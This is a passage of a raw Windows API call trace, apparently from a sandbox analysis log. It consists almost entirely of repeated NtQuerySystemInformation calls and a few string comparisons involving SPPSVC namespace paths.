SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.867] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.867] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.867] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.867] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd810, Length=0x28, ResultLength=0x0) [0213.867] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.868] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.868] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8f0, Length=0x38, ResultLength=0x0) [0213.868] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd770, Length=0x20, ResultLength=0x0) [0213.868] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6f0, Length=0x20, ResultLength=0x0) [0213.868] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.868] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6f0, Length=0x20, ResultLength=0x0) [0213.868] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.868] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6f0, Length=0x20, ResultLength=0x0) [0213.868] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.868] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8f0, Length=0x38, ResultLength=0x0) [0213.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd770, Length=0x20, ResultLength=0x0) [0213.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd700, Length=0x20, ResultLength=0x0) [0213.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd700, Length=0x20, ResultLength=0x0) [0213.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd870, Length=0x50, ResultLength=0x0) [0213.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7a0, Length=0x38, ResultLength=0x0) [0213.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5d0, Length=0x28, ResultLength=0x0) [0213.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5d0, Length=0x28, ResultLength=0x0) [0213.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5d0, Length=0x28, ResultLength=0x0) [0213.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5d0, Length=0x28, ResultLength=0x0) [0213.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd640, Length=0x28, ResultLength=0x0) [0213.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7a0, Length=0x38, ResultLength=0x0) [0213.876] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.876] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6c0, Length=0x28, ResultLength=0x0) [0213.878] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.879] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.879] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.879] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.879] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.879] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6c0, Length=0x28, ResultLength=0x0) [0213.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7a0, Length=0x38, ResultLength=0x0) [0213.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd620, Length=0x20, ResultLength=0x0) [0213.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5a0, Length=0x20, ResultLength=0x0) [0213.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5a0, Length=0x20, ResultLength=0x0) [0213.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5a0, Length=0x20, ResultLength=0x0) [0213.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7a0, Length=0x38, ResultLength=0x0) [0213.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd620, Length=0x20, ResultLength=0x0) [0213.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5b0, Length=0x20, ResultLength=0x0) [0213.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5b0, Length=0x20, ResultLength=0x0) [0213.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.882] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0213.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd858, Length=0x50, ResultLength=0x0) [0213.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd780, Length=0x38, ResultLength=0x0) [0213.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5b0, Length=0x28, ResultLength=0x0) [0213.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5b0, Length=0x28, ResultLength=0x0) [0213.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.886] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5b0, Length=0x28, ResultLength=0x0) [0213.886] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.886] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.886] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd620, Length=0x28, ResultLength=0x0) [0213.886] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.886] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.886] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd780, Length=0x38, ResultLength=0x0) [0213.886] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.886] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6a0, Length=0x28, ResultLength=0x0) [0213.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6a0, Length=0x28, ResultLength=0x0) [0213.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd780, Length=0x38, ResultLength=0x0) [0213.891] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd600, Length=0x20, ResultLength=0x0) [0213.891] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd580, Length=0x20, ResultLength=0x0) [0213.891] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.891] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd580, Length=0x20, ResultLength=0x0) [0213.891] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.891] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd580, Length=0x20, ResultLength=0x0) [0213.891] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.891] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.891] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.891] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.891] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd780, Length=0x38, ResultLength=0x0) [0213.891] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd600, Length=0x20, ResultLength=0x0) [0213.891] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd590, Length=0x20, ResultLength=0x0) [0213.892] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.892] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.892] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.892] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd590, Length=0x20, ResultLength=0x0) [0213.892] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.892] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.892] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.892] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.892] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.892] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.892] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbe0, Length=0x50, ResultLength=0x0) [0213.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb60, Length=0x28, ResultLength=0x0) [0213.893] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0213.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbe0, Length=0x50, ResultLength=0x0) [0213.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbe0, Length=0x50, ResultLength=0x0) [0213.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbe0, Length=0x50, ResultLength=0x0) [0213.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb10, Length=0x38, ResultLength=0x0) [0213.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd940, Length=0x28, ResultLength=0x0) [0213.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd940, Length=0x28, ResultLength=0x0) [0213.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd940, Length=0x28, ResultLength=0x0) [0213.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9b0, Length=0x28, ResultLength=0x0) [0213.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb10, Length=0x38, ResultLength=0x0) [0213.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x28, ResultLength=0x0) [0213.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x28, ResultLength=0x0) [0213.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb10, Length=0x38, ResultLength=0x0) [0213.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd990, Length=0x20, ResultLength=0x0) [0213.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd910, Length=0x20, ResultLength=0x0) [0213.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd910, Length=0x20, ResultLength=0x0) [0213.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd910, Length=0x20, ResultLength=0x0) [0213.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb10, Length=0x38, ResultLength=0x0) [0213.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd990, Length=0x20, ResultLength=0x0) [0213.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd920, Length=0x20, ResultLength=0x0) [0213.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd920, Length=0x20, ResultLength=0x0) [0213.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbe0, Length=0x50, ResultLength=0x0) [0213.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb60, Length=0x28, ResultLength=0x0) [0213.905] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0213.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbe0, Length=0x50, ResultLength=0x0) [0213.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbe0, Length=0x50, ResultLength=0x0) [0213.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbe0, Length=0x50, ResultLength=0x0) [0213.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb10, Length=0x38, ResultLength=0x0) [0213.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd940, Length=0x28, ResultLength=0x0) [0214.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd940, Length=0x28, ResultLength=0x0) [0214.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd940, Length=0x28, ResultLength=0x0) [0214.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9b0, Length=0x28, ResultLength=0x0) [0214.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb10, Length=0x38, ResultLength=0x0) [0214.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x28, ResultLength=0x0) [0214.119] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.119] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.119] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.119] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x28, ResultLength=0x0) [0214.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.120] NtQuerySystemInformation 